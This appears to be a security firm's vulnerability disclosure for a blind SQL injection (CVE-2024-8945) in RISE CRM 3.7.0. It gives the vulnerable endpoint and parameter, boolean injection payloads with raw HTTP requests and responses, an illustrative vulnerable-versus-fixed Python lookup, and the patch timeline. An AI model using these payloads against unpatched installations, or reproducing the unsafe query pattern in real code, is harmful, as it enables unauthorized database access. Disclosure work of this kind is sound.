Blind SQL Injection in RISE CRM (CVE-2024-8945)

Case study detailing the discovery, validation, and remediation of a blind SQL injection vulnerability in RISE CRM version 3.7.0.

Bytium Operators

Background

At Bytium, security validation is a standard step before recommending third-party software to clients. When a client considered adopting RISE CRM for customer and project management, we performed a security assessment to evaluate potential risks prior to deployment.

This case study documents the identification of a critical SQL injection vulnerability, our coordination with the vendor, and the resulting remediation.

Vulnerability Summary

Affected version: 3.7.0
Patched version: 3.7.1
CVE: CVE-2024-8945

A blind SQL injection vulnerability was identified that allows authenticated users to manipulate backend database queries through unsanitized input.

Technical Details

Vulnerability type: Blind SQL Injection
Severity: Critical

Vulnerable endpoint: /index.php/dashboard/save
Vulnerable parameter: id

Root cause:

$id = $this->request->getPost("id");

User input from a POST request is assigned directly to a variable without validation or sanitization, allowing crafted SQL payloads to influence backend queries.

Reproduction Steps

  1. Log in to RISE CRM version 3.7.0.
  2. Create a new dashboard.
  3. Intercept the POST request using an intercepting proxy.
  4. Modify the id parameter with the following payloads:
    • Failed payload: -1 OR 1=2-- -
    • Successful payload: -1 OR 1=1-- -
  5. Observe response differences confirming blind SQL injection.

Proof of Exploitation

Successful request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=1-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 200 OK
{"success":true,"dashboard_id":"-1 OR 1=1-- -","message":"The record has been saved."}

Failed request:

POST /rise/index.php/dashboard/save HTTP/1.1
id=-1 OR 1=2-- -&data=false&title=SQLI&color=#34495e

Response:

HTTP/1.1 302 Found

The response discrepancy confirms blind SQL injection behavior.
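The root cause above (a POST value spliced straight into query text) and the true/false response discrepancy it produces are shown side by side below, with the remediated form next to it. This is an added illustration, not RISE CRM's code: the table name, columns and rows are constructed, SQLite stands in for the CRM's database, and only the two payloads come from the advisory.

```python
import re
import sqlite3

# Constructed stand-in for the CRM's dashboard table (schema is an assumption).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dashboards (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO dashboards VALUES (?, ?)",
                     [(1, "Sales"), (2, "Support"), (3, "Projects")])
    return conn

def find_dashboard_unsafe(conn, raw_id: str):
    """Mirrors the root cause: the raw request value becomes part of the SQL text,
    so a boolean payload changes which rows match (true -> a row, false -> None)."""
    sql = f"SELECT id, title FROM dashboards WHERE id = {raw_id}"
    return conn.execute(sql).fetchone()

def parse_id(raw_id: str) -> int:
    """Allow-list validation: the id must be a plain positive integer, nothing else."""
    if not re.fullmatch(r"[1-9][0-9]*", raw_id):
        raise ValueError(f"invalid id: {raw_id!r}")
    return int(raw_id)

def find_dashboard_safe(conn, raw_id: str):
    """Remediated form: validate first, then bind the value as a query parameter
    so it can never alter the structure of the statement."""
    dashboard_id = parse_id(raw_id)
    return conn.execute("SELECT id, title FROM dashboards WHERE id = ?",
                        (dashboard_id,)).fetchone()

def safe_rejects(conn, raw_id: str) -> bool:
    """True when the hardened lookup refuses the input outright."""
    try:
        find_dashboard_safe(conn, raw_id)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    db = make_db()
    true_payload, false_payload = "-1 OR 1=1-- -", "-1 OR 1=2-- -"  # from the advisory
    print("unsafe, true  payload:", find_dashboard_unsafe(db, true_payload))
    print("unsafe, false payload:", find_dashboard_unsafe(db, false_payload))
    print("safe,   true  payload rejected:", safe_rejects(db, true_payload))
    print("safe,   legitimate id 2:", find_dashboard_safe(db, "2"))
```

The unsafe lookup reproduces the observed discrepancy (a row for the `1=1` payload, nothing for `1=2`), while the hardened lookup rejects both payloads before any query runs and still serves a legitimate integer id.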

Mitigation

The vendor was notified immediately after validation. A patched version (3.7.1) was released following coordination with the development team.

Users should upgrade to the latest version.

Disclosure Timeline

September 3, 2024 – Initial discovery
September 3, 2024 – Vendor notified
September 4, 2024 – Vendor response
September 9, 2024 – Patch released
September 12, 2024 – Public disclosure

Acknowledgment

This vulnerability was discovered by Jobyer Ahmed.
